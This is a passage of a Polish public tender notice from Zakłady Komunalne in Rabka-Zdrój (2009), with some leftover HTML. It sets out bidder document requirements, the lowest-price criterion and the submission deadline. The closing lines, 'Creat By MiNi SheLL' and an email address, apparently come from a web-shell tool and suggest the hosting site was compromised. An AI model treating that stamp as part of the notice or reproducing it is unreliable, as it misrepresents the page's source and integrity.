Zastrzeżenie  nie udostępniania informacji  należy złożyć w oddzielnej  zamkniętej kopercie , opisanej jako Zastrzeżenie  nie udostępniania informacji,opatrzonej nazwą i adresem wykonawcy  oraz nazwą postępowania  przetargowego.Załącznik  nr 6 do SIWZ- Zastrzeżenie nie udostępniania informacji winien być złożony  u Zamawiającego  nie później niż w terminie wyznaczonym  na składanie oferty .Nie złożenie załącznika  nr 6 -Zastrzeżenie nie udostępniania  informacji będzie traktowane przez Zamawiającego  jako zgoda Wykonawcy  na udostępnienie całej złożonej przez Niego oferty.
3.	Wszystkie dokumenty  winny być złożone  w formie oryginału  lub kserokopii poświadczonej za zgodność  z  orginałem  przez Wykonawcę.
4.	Jeżeli  Wykonawca  ma siedzibę  lub miejsce zamieszkania   poza terytorium Rzeczpospolitej Polskiej ,zamiast dokumentów ,o których mowa  w ust.3 pkt.2 podpkt.b),c),d)niniejszego rozdziału ,składa dokument  lub dokumenty  wystawione zgodnie  z prawem krajowym,w którym ma siedzibę lub miejsce  zamieszkania , potwierdzające odpowiednio,że:
1)	 Nie otwarto  jego likwidacji,ani nie zgłoszono  upadłości,
2)Nie zalega  z uiszczeniem podatków ,opłat   lub składek  na ubezpieczenie  społeczne  lub  zdrowotne  albo, że uzyskał  przewidziane prawem  zwolnienie , odroczenie  lub rozłożenie  na raty zaległych płatności  lub wstrzymanie  w całości  wykonania decyzji właściwego organu.
3)	Nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
4)	A w zakresie dokumentów , o których mowa w ust.3 pkt.2 podpkt.e składa zaświadczenie  właściwego organu sądowego lub administracyjnego  kraju pochodzenia  albo zamieszkania osoby,której dokumenty dotyczą.
     Dokumenty ,o których mowa w podpkt.1),3),4) powinny być  wystawione nie wcześniej  niż 6 miesięcy  przed upływem  terminu składania ofert a dokumenty,o których mowa w podpkt.2)powinny być wystawione  nie wcześniej  niż 3 miesiące przed upływem  terminu składania ofert.
5.	Jeżeli w kraju pochodzenia osoby lub w kraju,w którym wykonawca ma siedzibę lub miejsce  zamieszkania  nie wydaje się  dokumentów , o których mowa w ust.8 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem  sądowym ,administracyjnym  albo organem  samorządu zawodowego  lub gospodarczego  odpowiednio kraju pochodzenia osoby lub kraju , w którym wykonawca  ma siedzibę lub miejsce zamieszkania.
6.	Zamawiający w celach porównawczych  może żądać  przedstawienia oryginałów  lub notarialnie  poświadczonych kopii dokumentów.
7.	Dokumenty napisane w języku  obcym są składane  wraz z tłumaczeniem  na język polski, poświadczone  przez Wykonawcę ,sporządzone  i podpisane przez tłumacza przysięgłego
8.	Zamawiający ,działając  w oparciu o przepisy art.26 ust.3 Ustawy Pzp. Zastrzega sobie prawo  wezwania Wykonawców ,którzy w wyznaczonym terminie nie złożyli oświadczeń  i dokumentów potwierdzających  spełnienie  warunków udziału w postępowaniu lub, którzy  złożyli dokumenty  zawierające błędy do uzupełnienia tych oświadczeń  i dokumentów  w określonym przez Zamawiającego terminie. Powyższe działanie Zamawiającego będzie miało zastosowanie jedynie w przypadku , gdy nie wystąpią inne, prócz  wymienionych powyżej przesłanek, przyczyny do unieważnienia postępowania.
9.	Zamawiający ,działając w oparciu  o przepisy art.26 ust.4 Ustawy Pzp zastrzega sobie prawo  wezwania  Wykonawców ,do złożenia w wyznaczonym przez siebie terminie, wyjaśnień dotyczących oświadczeń ,o których mowa w niniejszym rozdziale ust.3.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rabka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakłady Komunalne Spółka z o.o.,
34-700 Rabka-Zdrój 
ul.Kilińskiego 46b

Sekretariat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 11:00, miejsce: Zakłady Komunalne Spółka z o.o.,adres 34-700 Rabka-Zdrój ul.Kilińskiego 46b.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com